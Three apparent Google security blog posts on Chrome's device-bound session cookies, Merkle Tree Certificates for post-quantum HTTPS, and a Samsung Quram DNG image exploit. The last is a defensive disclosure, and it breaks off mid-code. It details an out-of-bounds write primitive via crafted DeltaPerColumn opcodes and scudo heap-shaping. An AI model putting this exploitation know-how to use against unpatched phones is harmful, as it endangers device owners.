Posted by Ben Ackerman, Chrome team; Daniel Rubery, Chrome team; and Guillaume Ehinger, Google Account Security team
Following our April 2024 announcement, Device Bound Session Credentials (DBSC) is now entering public availability for Windows users on Chrome 146, and expanding to macOS in an upcoming Chrome release. This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape.
Session theft typically occurs when a user inadvertently downloads malware onto their device. Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server. Infostealer malware families, such as LummaC2, have become increasingly sophisticated at harvesting these credentials. Because cookies often have extended lifetimes, attackers can use them to gain unauthorized access to a user’s accounts without ever needing their passwords; this access is then often bundled, traded, or sold among threat actors.
Crucially, once sophisticated malware has gained access to a machine, it can read the local files and memory where browsers store authentication cookies. As a result, there is no reliable way to prevent cookie exfiltration using software alone on any operating system. Historically, mitigating session theft relied on detecting the stolen credentials after the fact using a complex set of abuse heuristics – a reactive approach that persistent attackers could often circumvent. DBSC fundamentally changes the web's capability to defend against this threat by shifting the paradigm from reactive detection to proactive prevention, ensuring that successfully exfiltrated cookies cannot be used to access users’ accounts.
How DBSC Works
DBSC protects against session theft by cryptographically binding authentication sessions to a specific device. It does this using hardware-backed security modules, such as the Trusted Platform Module (TPM) on Windows and the Secure Enclave on macOS, to generate a unique public/private key pair that cannot be exported from the machine. The issuance of new short-lived session cookies is contingent upon Chrome proving possession of the corresponding private key to the server. Because attackers cannot steal this key, any exfiltrated cookies quickly expire and become useless to those attackers. This design allows large and small websites to upgrade to secure, hardware-bound sessions by adding dedicated registration and refresh endpoints to their backends, while maintaining complete compatibility with their existing front-end. The browser handles the complex cryptography and cookie rotation in the background, allowing the web app to continue using standard cookies for access just as it always has.
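The registration/refresh contract can be sketched from the server's point of view. This is an illustrative model rather than the DBSC wire protocol: the class shape, cookie lifetime, and method names are ours, and a symmetric HMAC stands in for the TPM-backed asymmetric key pair purely to keep the sketch dependency-free (in real DBSC the browser signs with a non-exportable private key and the server verifies with the registered public key).

```python
import hashlib
import hmac
import secrets
import time

class DbscSession:
    """Server-side state for one device-bound session (illustrative only).

    Real DBSC stores the device's public key at registration; here an HMAC
    secret stands in for that key pair so the sketch is self-contained.
    """

    def __init__(self, device_key: bytes):
        self.device_key = device_key      # registered when the session starts
        self.pending_challenge = None
        self.cookie = None
        self.cookie_expiry = 0.0

    def issue_challenge(self) -> bytes:
        self.pending_challenge = secrets.token_bytes(32)
        return self.pending_challenge

    def refresh(self, proof: bytes, now: float):
        """Issue a new short-lived cookie only if the client proves
        possession of the device-bound key for the pending challenge."""
        expected = hmac.new(self.device_key, self.pending_challenge,
                            hashlib.sha256).digest()
        if not hmac.compare_digest(proof, expected):
            return None                    # a stolen cookie alone is useless
        self.cookie = secrets.token_hex(16)
        self.cookie_expiry = now + 600     # e.g. a ten-minute lifetime
        return self.cookie

# "Browser" side: prove possession of the non-exportable device key.
key = secrets.token_bytes(32)
session = DbscSession(key)
challenge = session.issue_challenge()
proof = hmac.new(key, challenge, hashlib.sha256).digest()
new_cookie = session.refresh(proof, time.time())
```

The point of the shape is that exfiltrating `new_cookie` buys an attacker only minutes: the next refresh requires a proof that can only be computed on the victim's device.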
Google rolled out an early version of this protocol over the last year. For sessions protected by DBSC, we have observed a significant reduction in session theft since its launch.
An overview of the DBSC protocol showing the interaction between the browser and server.
Private by design
A core tenet of the DBSC architecture is the preservation of user privacy. Each session is backed by a distinct key, preventing websites from using these credentials to correlate a user's activity across different sessions or sites on the same device. Furthermore, the protocol is designed to be lean: it does not leak device identifiers or attestation data to the server beyond the per-session public key required to certify proof of possession. This minimal information exchange ensures DBSC helps secure sessions without enabling cross-site tracking or acting as a device fingerprinting mechanism.
Engagement with the ecosystem
DBSC was designed from the beginning to be an open web standard, developed through the W3C process and adopted by the Web Application Security Working Group. Through this process we partnered with Microsoft on the design, ensuring it works for the web, and gathered input from many across the industry who are responsible for web security.
Additionally, over the past year we have conducted two Origin Trials to ensure DBSC effectively serves the requirements of the broader web community. Many web platforms, including Okta, actively participated in these trials and in their own testing, providing essential feedback to ensure the protocol effectively addresses their diverse needs.
If you are a web developer looking for a way to secure your users against session theft, refer to our developer guide for implementation details. Additionally, all the details about DBSC can be found in the spec and the corresponding GitHub repository. Feel free to use the issues page to report bugs or provide feature requests.
Future improvements
As we continue to evolve the DBSC standard, future iterations will focus on increasing support across diverse ecosystems and introducing advanced capabilities tailored for complex enterprise environments. Key areas of ongoing development include:
Securing Federated Identity: In modern enterprise environments, Single Sign-On (SSO) is ubiquitous. We are expanding the DBSC protocol to support cross-origin bindings, ensuring that a relying party (RP) session remains continuously bound to the same original device key used by the Identity Provider (IdP). This guarantees that the high-assurance security of the initial device binding is maintained throughout the entire federated login process, creating an unbroken chain of trust.
Advanced Registration Capabilities: While DBSC provides robust protection for established cookies, some environments require an even stronger foundation when the session is first created. We are developing mechanisms to bind DBSC sessions to pre-existing, trusted key material rather than generating a new key at sign-in. This advanced capability enables websites to integrate complementary technologies, such as mTLS certificates or hardware security keys, creating a highly secure registration environment.
Broader Device Support: We are also actively exploring the potential addition of software-based keys to extend protections to devices without dedicated secure hardware.
Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers. The Internet Engineering Task Force (IETF) recently created a working group, PKI, Logs, And Tree Signatures (“PLANTS”), aiming to address the performance and bandwidth challenges that the increased size of quantum-resistant cryptography introduces into TLS connections requiring Certificate Transparency (CT). We recently shared our call to action on preparing for quantum computing, and in earlier blogposts we have written about the challenges introduced by quantum-resistant cryptography and some of the steps we’ve taken to address them.
To ensure the scalability and efficiency of the ecosystem, Chrome has no immediate plan to add traditional X.509 certificates containing post-quantum cryptography to the Chrome Root Store. Instead, Chrome, in collaboration with other partners, is developing an evolution of HTTPS certificates based on Merkle Tree Certificates (MTCs), currently in development in the PLANTS working group. MTCs replace the heavy, serialized chain of signatures found in traditional PKI with compact Merkle Tree proofs. In this model, a Certification Authority (CA) signs a single "Tree Head" representing potentially millions of certificates, and the "certificate" sent to the browser is merely a lightweight proof of inclusion in that tree.
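The proof-of-inclusion idea can be sketched in a few lines of hashing. This is a toy, not the MTC draft's encoding: it uses RFC 6962-style leaf/node domain-separation prefixes (the Certificate Transparency hash) and requires a power-of-two leaf count for brevity, but it shows why the per-site "certificate" shrinks to a logarithmic handful of hashes plus one signed tree head.

```python
import hashlib

# 0x00/0x01 domain separation in the style of RFC 6962; the MTC draft's
# exact encoding may differ.
def leaf_hash(leaf: bytes) -> bytes:
    return hashlib.sha256(b"\x00" + leaf).digest()

def node_hash(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()

def tree_levels(leaves):
    """All levels of a Merkle tree over a power-of-two number of leaves."""
    level = [leaf_hash(l) for l in leaves]
    levels = [level]
    while len(level) > 1:
        level = [node_hash(level[i], level[i + 1])
                 for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

def inclusion_proof(levels, index):
    """Sibling hashes from leaf to root: the lightweight 'certificate'."""
    proof = []
    for level in levels[:-1]:
        proof.append(level[index ^ 1])
        index //= 2
    return proof

def verify(leaf, index, proof, root):
    node = leaf_hash(leaf)
    for sibling in proof:
        node = node_hash(node, sibling) if index % 2 == 0 \
            else node_hash(sibling, node)
        index //= 2
    return node == root

certs = [b"cert-%d" % i for i in range(8)]  # stand-ins for issued certs
levels = tree_levels(certs)
root = levels[-1][0]                        # the CA signs only this "Tree Head"
proof = inclusion_proof(levels, 3)
```

Even with millions of entries, the proof grows only with the logarithm of the tree size, while the single post-quantum signature over the tree head is amortized across every certificate in it.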
Why MTCs?
MTCs enable the adoption of robust post-quantum algorithms without incurring the massive bandwidth penalty of classical X.509 certificate chains. They also decouple the security strength of the corresponding cryptographic algorithm from the size of the data transmitted to the user. By shrinking the authentication data in a TLS handshake to the absolute minimum, MTCs aim to keep the post-quantum web as fast and seamless as today’s internet, maintaining high performance even as we adopt stronger security. Finally, with MTCs, transparency is a fundamental property of issuance: it is impossible to issue a certificate without including it in a public tree. This means the security properties of today’s CT ecosystem are included by default, and without adding extra overhead to the TLS handshake as CT does today.
Chrome’s MTC Propagation Plan
Chrome is already experimenting with MTCs on real internet traffic, and we intend to gradually build out our deployment so that MTCs provide robust, quantum-resistant HTTPS available for use throughout the internet.
Broadly speaking, our rollout spans three distinct phases.
Phase 1 (UNDERWAY): In collaboration with Cloudflare, we are conducting a feasibility study to evaluate the performance and security of TLS connections relying on MTCs. To ensure a seamless and secure experience for Chrome users who might encounter an MTC, every MTC-based connection is backed by a traditional, trusted X.509 certificate during this experiment. This "fail safe" allows us to measure real-world performance gains and verify the reliability of MTC issuance without risking the security or stability of the user's connection.
Phase 2 (Q1 2027): Once the core technology is validated, we intend to invite CT Log operators with at least one “usable” log in Chrome before February 1, 2026 to participate in the initial bootstrapping of public MTCs. These organizations have already demonstrated the operational excellence and high-availability infrastructure required to run global security services that underpin TLS connections in Chrome. Since MTC technology shares significant architectural similarities with CT, these operators are uniquely qualified to ensure MTCs are able to get off the ground quickly and successfully.
Phase 3 (Q3 2027): Early in Phase 2, we will finalize the requirements for onboarding additional CAs into the new Chrome Quantum-resistant Root Store (CQRS) and corresponding Root Program that only supports MTCs. This will establish a modern, purpose-built trust store specifically designed for the requirements of a post-quantum web. The Chrome Quantum-resistant Root Program will operate alongside our existing Chrome Root Program to ensure a risk-managed transition that maintains the highest levels of security for all users. This phase will also introduce the ability for sites to opt in to downgrade protections, ensuring that sites that only wish to use quantum-resistant certificates can do so.
This area is evolving rapidly. As these phases progress, we will continue our active participation in standards bodies such as the IETF and C2SP, ensuring that insights gathered from our efforts flow back towards standards, and that changes in standards are supported by Chrome and the CQRS.
Cultivating new practices and policy for a more secure and reliable web
We view the adoption of MTCs and a quantum-resistant root store as a critical opportunity to ensure the robustness of the foundation of today’s ecosystem. By designing for the specific demands of a modern, agile internet, we can accelerate the adoption of post-quantum resilience for all web users.
We expect this modern foundation for TLS to evolve beyond current ecosystem norms and emphasize themes of security, simplicity, predictability, transparency and resilience. These properties might be expressed by:
Grounding our approach in first principles, prioritizing only elements essential for establishing a secure connection between a server and a client.
Utilizing ACME-only workflows to reduce complexity and ensure the cryptographic agility required to respond to future threats across the entire ecosystem.
Upgrading to a modern framework for communicating revocation status. This allows legacy CRLs to be replaced and requirements to be streamlined to focus only on key-compromise events.
Exploring “reproducible” Domain Control Validation to create a model where proofs of domain control are publicly and persistently available, empowering any party to independently verify the legitimacy of a validation (i.e., serve as a “DCV Monitor”).
Enhancing the CA inclusion model to prioritize proven operational excellence. By establishing a pathway where prospective MTC CA Owners can first demonstrate their reliability as Mirroring Cosigners and DCV Monitors, we ensure that acceptance is based on verified performance and a reliable track record.
Evolving the third-party oversight model to prioritize complete, continuous, and externally verifiable monitoring. This shift would focus on ensuring a high standard of transparency and consistency, providing immediate and reliable insights into performance that can replace the function of annual third-party audits.
To secure the future of the web, we are dedicating our operational resources to two vital parallel tracks. First, we remain fully committed to supporting our current CA partners in the Chrome Root Store, facilitating root rotations to ensure existing non-quantum-resistant hierarchies remain robust and conformant with the Chrome Root Program Policy. Simultaneously, we are focused on building a secure future by developing and launching the infrastructure required to support MTCs and their default use in Chrome. We also expect to support “traditional” X.509 certificates with quantum-resistant algorithms for use only in private PKIs (i.e., those not included in the Chrome Root Store) later this year.
As we execute and refine our work on MTCs, we look forward to sharing a concrete policy framework for a quantum-resistant root store with the community, and are excited to learn and define clear pathways for organizations to operate as Chrome-trusted MTC CAs.
Between July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group.
Investigation showed that these were DNG files targeting the Quram library, an image-parsing library specific to Samsung devices.
On November 7, 2025, Unit 42 released a blogpost describing how these exploits were used and the spyware they dropped. In this blogpost, we would like to focus on the technical details of how the exploits worked. The exploited Samsung vulnerability was fixed in April 2025.
There has been excellent prior work describing image-based exploits targeting iOS, such as Project Zero’s writeup on FORCEDENTRY. Similar in-the-wild “one-shot” image-based exploits targeting Android have received far less public documentation, but that is certainly not because they do not exist. We therefore believe it is an interesting case study to publicly document the technical details of such an exploit on Android.
Attack vector
The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp:
IMG-20240723-WA0000.jpg
IMG-20240723-WA0001.jpg
IMG-20250120-WA0005.jpg
WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg
The first three filenames follow the naming scheme of WhatsApp on Android. The last filename is how WhatsApp Web names image downloads.
The first two images were received on the same day, based on the filename, potentially by the same target. Later analysis showed that the first image targets the jemalloc allocator, while the second one targets the scudo allocator, used on more recent Android versions. This blogpost will detail the scudo version of the exploit as this allocator is more hardened and relevant for recent devices. The concepts and techniques used in the jemalloc version are similar.
The final payload (as we’ll see later) indicates that the exploit expects to run within the com.samsung.ipservice process. How are WhatsApp and com.samsung.ipservice related and what is this process?
The com.samsung.ipservice process is a Samsung-specific system service responsible for providing “intelligent” or AI-powered features to other Samsung applications. It will periodically scan and parse images and videos in Android’s MediaStore.
When WhatsApp receives and downloads an image, it will insert it in the MediaStore. This means that downloaded WhatsApp images (and videos) can hit image parsing attack surface within the com.samsung.ipservice application.
However, WhatsApp is not designed to automatically download images from untrusted contacts. (WhatsApp on Android’s logic is a bit more nuanced; more details can be found in Brendon Tiszka’s report of a different issue.) This means that, without additional bypasses, and assuming the image is sent by an untrusted contact, a target would have to tap the image to trigger the download and have it added to the MediaStore, making this in fact a “1-click” exploit. We have no knowledge or evidence of the attacker using such a bypass, though.
A curious image
Before we delve into the exploit, let’s gather an understanding of what type of file we are looking at.
$ file "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg"
WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg: TIFF image data, little-endian, direntries=24, width=1, height=1, bps=8, compression=none, PhotometricInterpretation=BlackIsZero, description={"shape": [1, 1, 1]}, manufacturer=Canon, model=Canon EOS 350D DIGITAL, orientation=upper-left
$ exiftool "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg"
...
File Type : DNG
File Type Extension : dng
MIME Type : image/x-adobe-dng
...
Image Width : 16
Image Height : 16
Bits Per Sample : 8
Compression : Uncompressed
Photometric Interpretation : Color Filter Array
Image Description : {"shape": [16, 16]}
Samples Per Pixel : 1
X Resolution : 1
Y Resolution : 1
Resolution Unit : None
Tile Width : 16
Tile Length : 16
Tile Offsets : 6596538
Tile Byte Counts : 256
CFA Repeat Pattern Dim : 2 2
CFA Pattern 2 : 0 1 1 2
CFA Plane Color : Red,Green,Blue
CFA Layout : Rectangular
Active Area : 0 0 10 10
Opcode List 1 : [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...
Opcode List 2 : [opcode 23], [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...
Opcode List 3 : TrimBounds, DeltaPerColumn, DeltaPerColumn, DeltaPerColumn, ...
Subfile Type : Full-resolution image
Strip Offsets : 6596794
Strip Byte Counts : 1
...
(We truncated the “Opcode List” lines, since they contained thousands of opcodes in the actual exiftool output.)
Although the image was saved with a jpeg extension, this image is in fact a Digital Negative (DNG) image. According to Wikipedia:
Digital Negative (DNG) is an open source, lossless, well defined camera RAW data container with the goal to replace a range of proprietary, closed source raw image containers. It has been developed by Adobe. … DNG is based on the TIFF/EP standard format, and mandates significant use of metadata. The specification of the file format is open and not subject to any intellectual property restrictions or patents.
The image width and height look suspiciously small. And what are these opcode lists?
Some DNG format basics
The DNG format specification can be found on Adobe’s website.
DNG files use SubIFD trees, as described in the TIFF-EP specification, in order to contain multiple versions of the same image, such as a preview and a main image. This DNG file has 3 SubIFDs:
Type “Preview Image” with width 1 and length 1
Type “Main Image” with width 16 and length 16
Type “Main Image” with width 1 and length 1
As briefly mentioned above, the sizes of these images are obviously very suspicious, as is the fact that there are two “Main Image” types. We have not figured out what the purpose of the second main image is (if any).
DNG images can contain 3 “opcode lists”. As it will turn out, these “opcodes” are very important in the context of this exploit. Their goal is to offload some processing steps from the camera to the DNG reader; the intended use case is, for example, lens correction. There are 3 opcode lists because they are applied at different moments during DNG decoding:
The raw image bytes are read from the DNG file, a.k.a. the “stage 1” image
Opcode list 1 specifies the list of opcodes that should be applied to the stage 1 image
The DNG decoder maps the raw image bytes to linear reference values, which results in a “stage 2” image.
Opcode list 2 specifies the list of opcodes that should be applied to the stage 2 image
The DNG decoder performs demosaicing of the linear reference values, which results in a “stage 3” image.
Opcode list 3 specifies the list of opcodes that should be applied to the stage 3 image.
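The staged pipeline above can be modeled in a few lines. This is a toy: the linearization and demosaic steps here are crude stand-ins (real demosaicing interpolates the CFA pattern rather than triplicating values), but it shows where each of the three opcode lists runs.

```python
# Toy model of the staged DNG pipeline; each opcode is modeled as a callable
# that transforms the whole image.
def decode(raw, opcode_lists):
    stage1 = list(raw)                    # "stage 1": raw bytes from the file
    for op in opcode_lists[0]:
        stage1 = op(stage1)               # opcode list 1: applied to raw data
    stage2 = [v / 255.0 for v in stage1]  # map to linear reference values
    for op in opcode_lists[1]:
        stage2 = op(stage2)               # opcode list 2: linearized data
    stage3 = [(v, v, v) for v in stage2]  # "demosaic" into R, G, B planes
    for op in opcode_lists[2]:
        stage3 = op(stage3)               # opcode list 3: demosaiced data
    return stage3

identity = lambda img: img
out = decode([0, 255], [[identity], [identity], [identity]])
```

The exploit's interesting opcodes sit in list 3, i.e. they operate on the demosaiced, multi-plane stage 3 image.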
Every opcode has an opcode ID and a varying number and type of parameters. The latest specification (1.7.1.0, from September 2023) contains 14 distinct opcodes, with opcode IDs going from 1 to 14. Below is an example of an opcode description found in the specification:
For this exploit, only 3 opcodes will be of interest:
TrimBounds (opcode ID 6): This opcode trims the image to a specified rectangle.
MapTable (opcode ID 7): This opcode maps a specified area and plane range of an image through a 16-bit lookup table.
DeltaPerColumn (opcode ID 11): This opcode applies a per-column delta (constant offset) to a specified area and plane range of an image.
DeltaPerColumn and MapTable perform transformations on areas (defined by a top, left, bottom and right parameter) and plane ranges (defined by a first plane and number of planes parameter).
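To see how these parameters reach the decoder, here is a minimal reader for an OpcodeList blob. The 32-bit big-endian layout (an opcode count, then per opcode an ID, spec version, flags, and parameter byte count) follows the DNG specification, and the field order in `area_spec` follows the spec's DeltaPerColumn area/plane description; the trailing delta values are omitted for brevity, and the function names are ours.

```python
import struct

def parse_opcode_list(blob: bytes):
    """Split an OpcodeList blob into (id, flags, params) entries.

    Per the DNG spec, opcode list data is big-endian: a 32-bit count,
    then per opcode a 32-bit ID, spec version, flags, and parameter size.
    """
    (count,) = struct.unpack_from(">I", blob, 0)
    offset, opcodes = 4, []
    for _ in range(count):
        opcode_id, version, flags, param_len = \
            struct.unpack_from(">4I", blob, offset)
        offset += 16
        params = blob[offset:offset + param_len]
        offset += param_len
        opcodes.append({"id": opcode_id, "flags": flags, "params": params})
    return opcodes

def area_spec(params: bytes):
    """Decode the leading area/plane fields of a DeltaPerColumn-style opcode."""
    keys = ("top", "left", "bottom", "right",
            "plane", "planes", "rowPitch", "colPitch")
    return dict(zip(keys, struct.unpack_from(">8I", params, 0)))

# Rebuild the suspicious DeltaPerColumn parameters seen in this exploit
# (deltas omitted): area 0,0,1,1 with first plane 5125 and 5123 planes.
params = struct.pack(">8I", 0, 0, 1, 1, 5125, 5123, 1, 1)
blob = (struct.pack(">I", 1)
        + struct.pack(">4I", 11, 0x01040000, 1, len(params))
        + params)
(op,) = parse_opcode_list(blob)
```

Running `area_spec(op["params"])` on this blob surfaces exactly the out-of-range plane values that drive the bug discussed below.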
Looking at the opcode lists in the exiftool output above, we already notice some suspicious things:
They use opcodes with opcode ID 23 (which exiftool cannot map to an opcode name).
Typical benign DNG images will contain only a handful of opcodes, while for this image we have thousands of opcodes in the opcode lists.
Quram
As we mentioned before, the targeted process based on the payload is the Samsung-specific com.samsung.ipservice. The next question then becomes which code in this application performs the DNG decoding.
Looking at a decompiled com.samsung.ipservice APK (which on our test phone was located at /system/priv-app/IPService/IPService.apk), we can see that when the application parses a file with an extension of “jpg”, “jpeg”, “JPG” or “JPEG”, it will call into the Java method com.quramsoft.images.QrBitmapFactory.decodeFile (bundled in the same APK).
public class com.quramsoft.images.QrBitmapFactory {
    public static Bitmap decodeFile(String str, Options options) {
        Bitmap decodeFile = QuramBitmapFactory.decodeFile(str, options); // [1]; calls into Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2
        // Fails
        if ((options.inJustDecodeBounds && (options.outWidth > 0 || options.outHeight > 0)) || decodeFile != null) {
            return decodeFile;
        }
        try {
            Bitmap decodeFile2 = QuramDngBitmap.decodeFile(str, options); // [2]; calls into Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI
            if (options.outWidth <= 0) {
                if (options.outHeight <= 0) {
                    return decodeFile2;
                }
            }
            options.outMimeType = "image/dng";
            return decodeFile2;
        } catch (IOException e2) {
            e2.printStackTrace();
            return null;
        }
    }
}
The “Quram library” is a set of proprietary, closed-source software libraries used by Samsung on its Android devices. Its primary function is to process, parse, and decode various image formats. The library is not developed by Samsung itself. It is created by a third-party software vendor named Quramsoft. Mateusz Jurczyk already wrote about this library in 2020.
The QrBitmapFactory.decodeFile method will first try to decode the image using QuramBitmapFactory.decodeFile (see [1]), which calls the exported Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 function of the native library libimagecodec.quram.so. This function handles formats such as PNG, JPEG and GIF, but not DNG. This native library is not part of the IPService APK but rather located at /system/lib64/libimagecodec.quram.so.
When QuramBitmapFactory.decodeFile fails, QrBitmapFactory.decodeFile calls QuramDngBitmap.decodeFile as a fallback (see [2]), which then calls Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI. This function will perform the complete DNG decoding and it is within this code path the vulnerability is triggered and the exploit fully executes.
A few tools came in handy when analysing this exploit, which we’ll describe next.
First of all, on the static analysis side, we need an overview of the different opcodes that are called with their parameters. exiftool only gives us a list of the (translated) opcode IDs. To inspect every opcode with its parameters, we can use the dng_validate tool provided by Adobe’s DNG SDK with the -v flag. It will parse the opcode lists and we can post-process its textual output to make sense of the thousands of opcodes. Here is a snippet of what the output looks like, showing us the different parameters of a few TrimBounds and DeltaPerColumn opcodes.
On the dynamic analysis side, debugging com.samsung.ipservice would be very annoying, since it only runs periodically (although there are tricks to force start it). For easier debugging, we reused @flankerhqd’s fuzzing harness (in part based on Project Zero’s SkCodecFuzzer), which loads a DNG file provided as a filename into a buffer and passes it to libimagecodec.quram.so’s QrDecodeDNGPreview. We compile it as a standalone binary and can run it under a debugger.
It is noteworthy that QrDecodeDNGPreview (used in our harness) is not the export called by com.samsung.ipservice (which ends up calling QuramDngDecoder::decode). However, if there is no preview image available with one of the JPEG compression types, QrDecodeDNGPreview will call QuramDngDecoder::decodePreview, which will also perform a full DNG decoding and successfully triggers the vulnerability and exploit.
Our test phone was a Samsung Galaxy S21 5G (SM-G991B) running firmware version G991BXXSAFXCL, which has a security patch level of 2024-04-01.
The bug
Using the dng_validate tool we can make a listing of the sequence of opcodes called and their number of repetitions:
The specification mentions that if the flag bit is set (which it is), opcodes with unknown opcode IDs should be skipped. So let’s for the moment ignore the “Unknown” opcodes with ID 23 (more on them later).
Let’s look at the first 2 known opcodes, which occur in opcode list 3:
The DNG opcode parameters are embedded directly in the file. DeltaPerColumn takes a list of deltas to be applied to each pixel and the “Area Spec” to work over: top, left, bottom and right coordinates, the first plane and total number of planes being targeted, and the row and column pitch (rowPitch and colPitch). These values are controllable by the attacker.
The “first plane” (5125) and “number of planes” (5123) parameters of the DeltaPerColumn opcode are very suspicious. At stage 3 in the DNG decoding, the number of planes will be 3 (R, G and B), as can be seen in the CFA related data of the exiftool output. The first value (5125) is the first plane to apply the DeltaPerColumn to, while the second value (5123) is the number of planes. Since the planes are numbered 0 to 2, these values are clearly out of bounds.
Let’s have a look at QuramDngOpcodeDeltaPerColumn::processArea, which is the handler for the DeltaPerColumn opcode. Below are the lines of that function relevant to the vulnerability. (Variable names are our own, since this is a closed-source library.)
__int64 __fastcall QuramDngOpcodeDeltaPerColumn::processArea(QuramDngOpcode *opcode, QuramDngDecoder *decoder, QuramDngImage *image, QuramDngRect *rect)
{
    ...
    image_buffer = image->buffer;
    ...
    image_number_of_planes = image_buffer->planes;  // 3
    opcode_first_plane = opcode->plane;             // 5125
    ...
    opcode_number_of_planes = opcode->planes;       // 5123
    opcode_last_plane = image_number_of_planes + opcode_number_of_planes; // 3 + 5123 = 5126
    ...
    if (opcode_first_plane < opcode_last_plane)     // 5125 < 5126
    {
        ...
        current_plane = opcode_first_plane;         // 5125
        ...
        do
        {
            ...
            // Add delta to the value in the raw pixel buffer at offset
            // corresponding to plane `current_plane`, i.e. 5125!
            current_plane++;
        }
        while (current_plane != opcode_last_plane); // 5125 != 5126
        ...
    }
The function takes a few objects with Quram specific structure as arguments. The QuramDngImage describes the image on which the opcode is to be applied (which is the stage 3 image at this point). The QuramDngOpcode contains the DeltaPerColumn parameters. The function has a triple nested loop to iterate over the width, length and planes of the area. For every such triplet (width,length,plane) it calculates the offset in the raw pixel buffer and adds a delta to it. Only the plane loop is relevant for the bug and displayed in the code above.
Below is an example of a 6x6 image with its different color planes and to what offsets the pixel values map in the raw pixel buffer. During stage 2 and stage 3 image processing, each pixel value in each color plane takes 16 bits.
There are two issues in that handler function:
opcode_last_plane is calculated incorrectly. It should be opcode_first_plane + opcode_number_of_planes (as will be the case in the patched version). This by itself is a correctness issue (and a pretty basic one that would be expected to surface by normal usage or testing of the library).
The plane used in the offset calculation is bounded by opcode_last_plane, but at no point is it checked that opcode_last_plane is within the number of planes that the image contains.
The actual values from the exploit are annotated as comments in the code snippet. With these values, the plane loop will be executed exactly once. The width and length loop will also be executed only once, since t=0, l=0, b=1, r=1. This means exactly one write will happen. Since the stage 3 image in the exploit has a width 1 and length 1, the write will happen at offset 5125 x 2 = 10250 from the raw pixel buffer.
Not only is the offset of the write controlled; the value to be added to the current value in the raw pixel buffer is also fully controlled, since it is an opcode parameter. In this case it is 26214.0 (or 0x6666). This vulnerability thus gives a very strong primitive from the start: the attacker can add chosen values at chosen offsets relative to the raw pixel buffer.
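Plugging the exploit's values into the buggy bound computation makes the primitive concrete. This is plain arithmetic mirroring the decompiled logic, with the offset model for the 1x1 stage 3 image, where the plane index times two bytes gives the byte offset into the raw pixel buffer.

```python
# The buggy bound computation from processArea, reduced to arithmetic.
image_planes = 3            # stage 3 image: R, G, B
first_plane = 5125          # attacker-controlled opcode parameter
num_planes = 5123           # attacker-controlled opcode parameter

# Bug 1: the bound should be first_plane + num_planes, but the decoder
# adds the image's plane count instead.
last_plane = image_planes + num_planes        # 3 + 5123 = 5126
# Bug 2: last_plane is never checked against image_planes, so the single
# loop iteration below targets plane 5125 of a 3-plane image.
planes_touched = list(range(first_plane, last_plane))

bytes_per_value = 2                           # 16-bit values at stage 3
write_offset = planes_touched[0] * bytes_per_value
```

With a 1x1x3 stage 3 image whose raw pixel buffer holds only six bytes, the write lands 10250 bytes past its start, and both the offset and the delta added there are attacker-chosen.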
Now why do we need that TrimBounds opcode before triggering the bug? That will become clear when we discuss the heap shaping strategy.
Exploit flow
Heap shaping strategy
Since the buffers containing the pixel values are dynamically allocated on the heap, we need to understand which heap allocations the Quram library makes and how those allocations behave in order to reconstruct the heap layout at the time the vulnerability triggers.
As we mentioned earlier, exploits exist for Android versions using both jemalloc and scudo allocator. We will analyse the exploit targeting the scudo allocator, since this is the common allocator on modern Android versions. The same techniques were used in a different way in the jemalloc exploit.
Scudo
We will not give a detailed overview of Android’s scudo allocator, which serves the allocations here, since excellent documentation by Synacktiv already exists, to which we refer. We will only mention the elements that are important for this exploit.
Scudo allocates objects in different heap regions depending on the allocation size. For two objects of different types to land near each other, they need to belong to the same size class. The size required from the allocator’s point of view for a “block” is composed of:
A header of 0x10 bytes
The chunk with the user requested size. A pointer to the chunk is returned to the caller.
New allocations are retrieved via “transfer batches”. The number of allocations in a transfer batch depends on the size class. For the size we will be interested in (chunks of 0x30 bytes, i.e. blocks of 0x40 bytes), there are 52 allocations in a transfer batch. The allocations within a transfer batch are returned in a randomized order, however subsequent transfer batches are just laid out linearly in memory. A consequence of this is that given enough allocations between two allocations of the same size, an attacker can be confident that the last allocation falls after the first allocation.
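In concrete numbers for the size class the exploit relies on, the layout arithmetic looks as follows; this is an illustrative sketch of the constants described above, not scudo code.

```python
# Arithmetic for the scudo size class used by the exploit: 0x30-byte
# chunks live in 0x40-byte blocks, 52 blocks to a transfer batch.
header_size = 0x10                      # per-block scudo header
chunk_size = 0x30                       # chunk returned to the caller
block_size = header_size + chunk_size   # 0x40 bytes per block
batch_size = 52                         # allocations per transfer batch
batch_span = batch_size * block_size    # bytes covered by one full batch

# Order within a batch is randomized, but batches themselves are laid out
# linearly in memory: an allocation made at least one full batch after
# another can be expected to land at a higher address.
```

This is what makes the relative positioning of sprayed objects predictable despite the per-batch randomization.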
Lastly, scudo supports a quarantine mechanism that prevents freed allocations from being returned immediately on the next allocation request. However, on Android this quarantine mechanism is disabled. The consequence is that a freed object will be directly reallocated on the next allocation request of the same size.
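The three properties above (size classes with a 0x10-byte header, randomized transfer batches laid out linearly, and immediate reuse of freed chunks) can be captured in a small toy model. This is an illustrative sketch for building intuition only, not scudo's actual implementation; all names are ours:

```python
import random

HEADER = 0x10
BATCH = 52  # transfer batch size for the 0x40-byte block class

def block_size(requested):
    # A chunk of `requested` bytes is preceded by a 0x10-byte header;
    # the whole block is rounded up to the class granularity (0x10 here).
    return -(-(HEADER + requested) // 0x10) * 0x10

class ToyRegion:
    """Toy model of one scudo size-class region (sketch, not real scudo)."""
    def __init__(self, base=0x1000):
        self.next_batch_base = base
        self.free = []  # freelist: freed chunks are handed out again first

    def alloc(self):
        if self.free:
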